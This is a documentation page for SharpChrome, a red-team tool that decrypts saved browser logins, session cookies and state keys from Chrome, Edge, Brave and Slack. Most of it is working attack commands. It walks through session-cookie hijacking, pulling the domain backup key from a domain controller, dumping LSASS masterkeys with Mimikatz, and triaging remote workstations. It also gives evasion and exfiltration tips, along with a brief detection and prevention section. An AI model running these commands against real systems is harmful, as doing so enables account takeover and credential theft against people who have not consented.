Skip to main content
  __                 _
 (_  |_   _. ._ ._  /  |_  ._ _  ._ _   _
 __) | | (_| |  |_) \_ | | | (_) | | | (/_
                |
  v1.9.0

What is SharpChrome?

SharpChrome is a Chromium-based browser credential extraction tool built as a subproject of SharpDPAPI. It specializes in decrypting saved passwords, cookies, and state keys from Chrome, Edge, Brave, and Slack applications that use Chromium’s credential storage system.
SharpChrome is an adaptation of @djhohnstein’s SharpChrome project with enhancements including lockless SQLite database access and AES state key decryption for Chrome 80+.

Supported Applications

Google Chrome

Original Chromium browser - cookies and login data

Microsoft Edge

Chromium-based Edge browser credentials

Brave Browser

Privacy-focused Chromium browser data

Slack

Slack desktop application credentials

Key Features

  • Cookies
  • Logins
  • State Keys
  • Domain Operations
Extract Browser Cookies:
  • Decrypt saved session cookies
  • Filter by cookie name or URL with regex
  • Export in EditThisCookie JSON format
  • Set cookies to never expire for persistence

Chrome 80+ Architecture Changes

Starting with Chrome 80, Google changed how credentials are encrypted:
SharpChrome automatically detects Chrome versions and uses the appropriate decryption method. For Chrome 80+, it first decrypts the AES state key, then uses it to decrypt cookies and logins.

Command Overview

logins

Extract and decrypt saved login credentials from Chromium-based browsers. 
# Decrypt current user's Chrome logins
SharpChrome.exe logins

# Target Edge browser
SharpChrome.exe logins /browser:edge

# Use domain backup key for any user
SharpChrome.exe logins /pvk:key.pvk

# Remote system triage
SharpChrome.exe logins /server:workstation.domain.com /pvk:key.pvk

cookies

Extract and decrypt browser cookies for session hijacking or analysis. 
# Get all cookies for current user
SharpChrome.exe cookies

# Filter by cookie name (regex)
SharpChrome.exe cookies /cookie:"session.*"

# Filter by URL (regex)
SharpChrome.exe cookies /url:".*github\.com.*"

# Export in EditThisCookie JSON format
SharpChrome.exe cookies /format:json /setneverexpire

# Target specific browser
SharpChrome.exe cookies /browser:brave

statekeys

Extract and decrypt AES state keys required for Chrome 80+ decryption. 
# Extract state keys for all Chromium apps
SharpChrome.exe statekeys

# Use extracted state key with other commands
SharpChrome.exe cookies /statekey:AABBCC...

# Target specific application
SharpChrome.exe statekeys /browser:slack

backupkey

Retrieve the domain DPAPI backup key from a domain controller (same as SharpDPAPI). 
# Retrieve domain backup key
SharpChrome.exe backupkey

# Specify DC and output file
SharpChrome.exe backupkey /server:dc.domain.com /file:key.pvk

Decryption Methods

  • Automatic (CryptUnprotectData)
  • Domain Backup Key
  • User Credentials
  • Masterkey Mappings
When run from an unelevated context, SharpChrome automatically uses CryptUnprotectData() to decrypt the current user’s data:
# Run as current user - no additional arguments needed
SharpChrome.exe logins
SharpChrome.exe cookies
Requirements:
  • Running in target user’s context
  • No elevation needed
  • Only decrypts current user’s data

Common Arguments

  • Decryption
  • Targeting
  • Output
  • Filtering (Cookies Only)
ArgumentDescription
/unprotectForce CryptUnprotectData() (default when unprivileged)
/pvk:BASE64...Use base64-encoded domain backup key
/pvk:key.pvkUse domain backup key file
/password:XDecrypt using plaintext password
/ntlm:XDecrypt using NTLM hash
/prekey:XUse DPAPI prekey (from Mimikatz)
/rpcDecrypt by asking domain controller
{GUID}:SHA1 ...Use explicit masterkey mappings
/statekey:XUse pre-decrypted AES state key
1

Extract Target Cookies

# Extract GitHub session cookies
SharpChrome.exe cookies /url:".*github\.com.*" /format:json /setneverexpire /pvk:key.pvk
2

Import into Browser

  1. Install EditThisCookie extension
  2. Navigate to target site (e.g., github.com)
  3. Click EditThisCookie icon
  4. Click import button
  5. Paste JSON output from SharpChrome
3

Access Target Account

Refresh the page - you’re now authenticated as the target user

Typical Workflows

# No privileges required - decrypt your own data
SharpChrome.exe logins
SharpChrome.exe cookies /url:".*company\.com.*"

# Works for all supported browsers
SharpChrome.exe logins /browser:edge
SharpChrome.exe cookies /browser:brave

# 1. Extract masterkeys from LSASS with Mimikatz
mimikatz# sekurlsa::dpapi

# 2. Decrypt all users' Chrome data
SharpChrome.exe logins {GUID1}:SHA1 {GUID2}:SHA1
SharpChrome.exe cookies {GUID1}:SHA1 {GUID2}:SHA1

# 1. Retrieve domain backup key
SharpChrome.exe backupkey /file:key.pvk

# 2. Triage local system
SharpChrome.exe logins /pvk:key.pvk
SharpChrome.exe cookies /pvk:key.pvk

# 3. Triage remote systems
SharpChrome.exe logins /pvk:key.pvk /server:workstation1.domain.com
SharpChrome.exe logins /pvk:key.pvk /server:workstation2.domain.com

# 4. Extract specific high-value cookies
SharpChrome.exe cookies /pvk:key.pvk /url:".*aws\.amazon\.com.*" /format:json

# 1. Copy Local State and Login Data files from target

# 2. Decrypt state key
SharpChrome.exe statekeys /target:"C:\Evidence\Local State" /pvk:key.pvk

# 3. Use state key to decrypt logins
SharpChrome.exe logins /target:"C:\Evidence\Login Data" /statekey:AABBCC...

Lockless Database Access

SharpChrome uses a modified C# SQLite library that supports lockless opening of databases. This means Chrome/Edge does not need to be closed, and database files don’t need to be copied to another location before analysis.
Benefits:
  • No need to close browser before extraction
  • Direct access to live databases
  • Reduced forensic footprint
  • Faster operations
Implementation:
  • Uses WAL (Write-Ahead Logging) mode
  • Read-only access to database
  • No interference with running browser

Detection Considerations

SharpChrome operations generate various indicators that can be detected by security monitoring tools.
File Access Indicators:
  • Reading Chrome/Edge/Brave user data directories
  • Accessing Login Data and Cookies SQLite databases
  • Reading Local State files
  • Accessing user DPAPI masterkey folders
Process Indicators:
  • SharpChrome.exe execution
  • Unusual SQLite database access patterns
  • Non-browser processes accessing browser data
  • SMB access to browser data on remote systems
  • MS-BKRP protocol for backup key retrieval
  • DC RPC calls for domain backup key
  • Bulk access to multiple users’ browser data
  • Accessing browser databases while browser is running
  • Reading Local State files for state key extraction
  • Simultaneous access to DPAPI and browser data
Detection:
  • Monitor access to browser data directories
  • Alert on non-browser processes accessing SQLite databases
  • Track DPAPI masterkey folder access
  • Detect domain backup key retrieval
Prevention:
  • Use hardware tokens for critical accounts
  • Implement browser extensions that require re-authentication
  • Monitor for cookie theft/session hijacking
  • Regular credential rotation

SQLite Library

SharpChrome uses a minimized, modified version of a C# SQLite library that supports:
  • Lockless database opening
  • Read-only access mode
  • WAL mode support
  • Direct file access without copying
SharpChrome is built as a separate project in the SharpDPAPI solution due to the size of the SQLite library.

BCrypt Implementation

SharpChrome includes a minimized version of @AArnott’s BCrypt P/Invoke code released under the MIT License for AES state key decryption.

Prerequisites

  • Visual Studio 2019 Community Edition or later
  • .NET Framework 3.5 (default target)
  • Can be retargeted to .NET 4.0 or 4.5
  • Larger binary size due to SQLite library
  • Windows operating system
  • .NET Framework on target
  • Chromium-based browser installed (Chrome, Edge, Brave, or Slack)
Current User Context:
  • No elevation required
  • Can only decrypt current user’s data
Elevated Context:
  • Local Admin: Can decrypt all users on system
  • Domain Admin: Can decrypt any domain user with backup key

Operational Security

Minimize Detection:
  • Use from current user context when possible
  • Avoid dumping all cookies/logins unnecessarily
  • Target specific high-value accounts with filtering
  • Use /consoleoutfile to minimize screen artifacts
Post-Exploitation:
  • Delete temporary files
  • Clear command history
  • Consider in-memory execution
  • Exfiltrate data securely
  • Embed in post-exploitation frameworks
  • Automate with PowerShell wrappers
  • Combine with credential spraying
  • Use for lateral movement via cookie hijacking

Output Formats

  • CSV (Default)
  • Table
  • JSON (Cookies Only)
url,username,password
https://github.com/login,user@example.com,SecretPassword123
https://mail.google.com,admin@company.com,GooglePassword456
Best for: Log analysis, data processing, spreadsheet import

Additional Resources

Original SharpChrome

@djhohnstein’s original SharpChrome project

Chrome Encryption Changes

Details on Chrome 80+ encryption changes

EditThisCookie Extension

Cookie import extension for Chrome

SharpDPAPI Repository

Main SharpDPAPI repository containing SharpChrome

Next Steps

Extract Logins

Start extracting saved passwords

Hijack Cookies

Learn cookie extraction and hijacking

State Keys

Extract AES state keys for offline analysis

Build SharpChrome

Compile SharpChrome from source

License

SharpChrome is part of SharpDPAPI and is licensed under the BSD 3-Clause license.
SharpChrome is adapted from @djhohnstein’s work and incorporates DPAPI functionality from Benjamin Delpy’s Mimikatz project.